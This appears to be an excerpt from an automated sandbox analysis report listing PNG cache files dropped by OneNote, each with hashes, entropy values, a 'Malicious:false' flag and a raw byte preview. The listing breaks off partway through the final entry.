                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003C.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003D.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003E.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003F.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003G.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003H.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003I.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003J.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003K.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003Q.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003R.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003S.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
